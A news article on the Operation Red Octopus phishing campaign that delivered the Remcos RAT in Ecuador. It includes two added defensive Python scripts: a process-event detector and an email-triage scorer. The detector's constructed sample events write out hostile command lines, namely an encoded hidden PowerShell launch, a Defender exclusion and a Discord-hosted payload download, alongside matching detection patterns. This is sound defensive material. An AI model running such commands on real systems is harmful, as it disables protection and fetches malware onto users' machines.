Between late June and early August, the so-called Operation Red Octopus took place: a malware campaign that registered activity in several Latin American countries, but with marked repercussions in Ecuador, where it targeted government agencies, health-sector organizations and private companies from different industries.
The malware the campaign attempted to distribute was the well-known Remcos Remote Access Trojan (RAT), according to cybersecurity company ESET Latin America. Although Remcos is software developed to monitor and manage devices remotely, for several years it has also been used by cybercriminals in malicious campaigns that seek to spy on victims and steal information from their computers.
Victims were infected through phishing. For example, there were emails that appeared to come from the Ecuadorian State Attorney General's Office (FGE, Fiscalía General del Estado) and referred to alleged legal proceedings, lawsuits or even bank transfers. The FGE-themed emails claimed that the user had a "pending" lawsuit and asked them to download the infected file.
These emails include a link that downloads a password-protected compressed file; the password also keeps email gateways from inspecting the archive's contents. Opening the file inside, which is made to look like a Word document, triggers a two-stage infection process that ends with the Remcos RAT installed on the victim's computer.
In the first stage, the malicious file executes a second piece of malicious code that downloads a file hosted on Discord, which modifies Windows Defender settings to evade detection. It also downloads a second compressed file, likewise hosted on Discord, containing a malicious executable developed in .NET that establishes persistence and runs Remcos.
This Trojan lets the attackers carry out a range of actions on the compromised computer through commands issued remotely, for example:
- Take screenshots
- Log the user's keystrokes (keylogging)
- Record audio
- Manipulate files
- Run commands remotely on the machine
- Run scripts remotely on the machine
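The chain described above (Office-looking lure, Defender settings tampered with, stage payloads pulled from Discord) leaves traces in host telemetry. The following is an added example, not ESET's analysis or code from the article: a small detector run over constructed process-creation events. The field names loosely follow Sysmon Event ID 1, the specific Defender cmdlets and the Discord CDN host are assumptions (the article only says the loader "modifies Windows Defender settings" and that payloads were "hosted on Discord"), and the Word-spawns-script-host rule is a common hunting heuristic, not something the article states.

```python
"""Detection sketch for the Red Octopus infection chain described above.

Constructed example. Input: hand-written process-creation events whose shape
is loosely modelled on Sysmon Event ID 1 (field names are an assumption).
The Defender tampering cmdlets, the Discord CDN hosts and the Office-to-script
parent/child rule are assumptions, not details reported in the article.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # image name of the parent process
    image: str     # image name of the newly created process
    cmdline: str   # full command line of the new process


# Constructed sample telemetry: events 0 and 4 are benign, 1-3 mirror the chain.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" report.docx'),
    ProcEvent("WINWORD.EXE", "powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgA..."),
    ProcEvent("powershell.exe", "powershell.exe",
              'powershell.exe Add-MpPreference -ExclusionPath "C:\\Users\\Public"'),
    ProcEvent("powershell.exe", "powershell.exe",
              "powershell.exe Invoke-WebRequest https://cdn.discordapp.com/attachments/111/222/stage2.rar "
              "-OutFile C:\\Users\\Public\\s2.rar"),
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs -p"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Assumed tampering pattern: Set-/Add-MpPreference disabling a feature or adding an exclusion.
DEFENDER_TAMPER = re.compile(
    r"(?i)\b(Set|Add)-MpPreference\b.*?-(Disable\w+|Exclusion(Path|Process|Extension))"
)
# Assumed hosts used for Discord attachment downloads.
DISCORD_CDN = re.compile(r"(?i)https?://(cdn\.discordapp\.com|media\.discordapp\.net)/attachments/")


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of all rules the event matches (empty list if none)."""
    hits = []
    if ev.parent.lower() in OFFICE_APPS and ev.image.lower() in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if DEFENDER_TAMPER.search(ev.cmdline):
        hits.append("defender_tampering")
    if DISCORD_CDN.search(ev.cmdline):
        hits.append("discord_cdn_download")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Flatten matches into (event index, rule name) pairs for reporting."""
    return [(i, hit) for i, ev in enumerate(events) for hit in classify(ev)]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule on its own is noisy in a real estate (administrators do add Defender exclusions); the value is in the three firing from the same process tree within minutes, which is why `scan` keeps the event index rather than collapsing to a single verdict.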
The name of the downloaded attachment varies. Some examples of the names used in this campaign:
- ADMINISTRATIVE DEMAND CRIMINAL TRIAL.rar
- BANK TRANSFER ATTACHED PROOF.rar
- CRIMINAL PROCESS TRIAL DEMAND FILED (1).rar
- TRIAL NO. 2586522 COURT 2 JUDICIAL CALL.exe
- PROSECUTOR CRIMINAL PROCESS TRIAL DEMAND FILED (2).rar
- TRANSFER VOUCHER MADE TO YOUR COMPANY CURRENT ACCOUNT (1).rar
- CRIMINAL PROCESS COMMUNICATION OF TRIAL DEMAND FILED.rar
- ADMINISTRATIVE BUSINESS JUDICIAL PROCESS CALLED 1 ATTORNEY GENERAL.rar
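The lure names above share two traits a mail gateway or SOC analyst can key on: they are archives (or, in one case, a bare executable) and they stack legal or banking vocabulary to create urgency. The following is an added example, not code from ESET or El Universo: a triage routine that scores a message on attachment type, lure vocabulary and a display-name versus sender-domain mismatch (the check the article's closing advice describes). The sender allowlist, the `.example` domains and the sample messages are assumptions constructed for the example; the filenames are those listed above (as translated).

```python
"""Email triage for the lure pattern described above.

Constructed example, not code from ESET or El Universo. Scores a message on:
  (a) attachment type (archive or directly executable),
  (b) legal/banking lure words in the attachment name (translated vocabulary
      taken from the names the article lists),
  (c) a display name claiming an institution whose domain is not allowlisted.
The allowlist, the reserved .example domains and the sample messages are
assumptions made up for this example.
"""
import re
from dataclasses import dataclass

ARCHIVE_EXT = {".rar", ".zip", ".7z", ".iso", ".img"}
EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".hta", ".lnk", ".msi"}
# Words that recur in this campaign's lure names (as translated in the article).
LURE_WORDS = {"TRIAL", "DEMAND", "CRIMINAL", "JUDICIAL", "PROSECUTOR", "ATTORNEY",
              "TRANSFER", "VOUCHER", "PROOF"}

# Assumed allowlist: a claim made in the display name -> domains allowed to make it.
# Domains are RFC 2606 placeholders, not the institutions' real domains.
TRUSTED = {
    "attorney general": {"fge.example"},
    "bank": {"bank.example"},
}


@dataclass(frozen=True)
class Mail:
    display_name: str
    address: str
    attachment: str


def extension(name: str) -> str:
    """Lower-cased final extension, or '' when there is none."""
    m = re.search(r"\.([A-Za-z0-9]{1,4})$", name.strip())
    return "." + m.group(1).lower() if m else ""


def lure_word_hits(name: str) -> set[str]:
    """Lure vocabulary present in the attachment name."""
    return set(re.findall(r"[A-Z]+", name.upper())) & LURE_WORDS


def sender_mismatch(m: Mail) -> bool:
    """True when the display name claims a trusted institution but the
    address domain is not allowlisted for that claim."""
    domain = m.address.rsplit("@", 1)[-1].lower()
    display = m.display_name.lower()
    return any(claim in display and domain not in domains
               for claim, domains in TRUSTED.items())


def score(m: Mail) -> tuple[int, list[str]]:
    """Return (number of indicators, human-readable reasons)."""
    reasons = []
    ext = extension(m.attachment)
    if ext in EXEC_EXT:
        reasons.append(f"executable attachment ({ext})")
    elif ext in ARCHIVE_EXT:
        reasons.append(f"archive attachment ({ext}); a password-protected archive defeats gateway scanning")
    hits = lure_word_hits(m.attachment)
    if len(hits) >= 2:
        reasons.append("legal/banking lure words in filename: " + ", ".join(sorted(hits)))
    if sender_mismatch(m):
        reasons.append("display name claims an institution the sender domain is not allowlisted for")
    return len(reasons), reasons


# Constructed samples: a lure from a look-alike domain, a lure from the
# allowlisted domain, and a benign message.
SAMPLES = [
    Mail("Attorney General's Office", "notificaciones@mail-example.xyz",
         "TRIAL NO. 2586522 COURT 2 JUDICIAL CALL.exe"),
    Mail("Attorney General's Office", "notificaciones@fge.example",
         "ADMINISTRATIVE DEMAND CRIMINAL TRIAL.rar"),
    Mail("Ana Perez", "ana@bank.example", "invoice-2023-07.pdf"),
]

if __name__ == "__main__":
    for m in SAMPLES:
        n, why = score(m)
        print(f"{m.attachment!r}: {n} indicator(s)")
        for r in why:
            print("  -", r)
```

Note that the second sample still scores two indicators even with a legitimate sender domain: a compressed attachment whose name is a wall of court vocabulary is suspicious on its own, which is why the attachment checks are kept independent of the sender check.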
To avoid falling victim to a malware campaign like this one, the first thing is to learn to recognize possible phishing emails, ESET notes. For this, it is important to pay attention to the sender's email address and to avoid downloading or executing attached files or links if there is the slightest doubt or suspicion that the email may not be legitimate. (YO)
Source: Eluniverso

Paul is a talented author and journalist with a passion for entertainment and general news. He currently works as a writer at the 247 News Agency, where he has established himself as a respected voice in the industry.